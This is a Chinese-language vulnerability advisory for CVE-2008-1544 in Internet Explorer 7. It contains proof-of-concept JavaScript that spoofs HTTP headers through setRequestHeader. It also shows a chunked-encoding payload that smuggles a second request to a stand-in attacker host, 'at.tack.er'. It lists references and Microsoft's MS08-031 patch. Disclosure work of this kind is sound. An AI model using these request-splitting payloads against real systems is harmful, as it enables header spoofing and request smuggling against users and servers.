发布日期：2008-03-21
更新日期：2008-06-16

受影响系统：

Microsoft Internet Explorer 7.0.5730.11
    - Microsoft Windows XP SP2

描述：

---

BUGTRAQ  ID: 28379
CVE(CAN) ID: CVE-2008-1544

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头，导致HTTP头信息欺骗。

类似于以下javascript：

----------------------------------------------
var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
   }
}
x.send("blah");
----------------------------------------------

会覆盖以下头：

- Content-Length
   x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");

- Host

   x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");

- Referer

   x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
   x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");

Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头，导致Http请求拆分/渗透漏洞。

假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上，且用户没有配置代理，由于IE7允许设置

setRequestHeader("Transfer-Encoding","chunked");

因此就允许将POST请求中的负载用作Web服务器的其他请求。例如：

-----------------------------------------------------
var x=new XMLHttpRequest();

for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");

x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
    }
}
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n")  }catch(r){} }
-----------------------------------------------------

请求会变为：

----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest
----------------------------------------------------

这样Web服务器就会打开套接字等待负载。

<*来源：Stefano Di Paola （stefano@dipaola.wisec.it）
  
  链接：http://marc.info/?l=webappsec&m=120611364624166&w=2
        http://marc.info/?l=webappsec&m=120611380224435&w=2
        http://secunia.com/advisories/29453/
        http://www.microsoft.com/technet/security/bulletin/MS08-031.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA08-162B.html
*>

建议：

---

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS08-031）以及相应补丁:
MS08-031：Cumulative Security Update for Internet Explorer (950759)
链接：http://www.microsoft.com/technet/security/bulletin/MS08-031.mspx?pf=true

浏览次数：3208
严重程度：0（网友投票）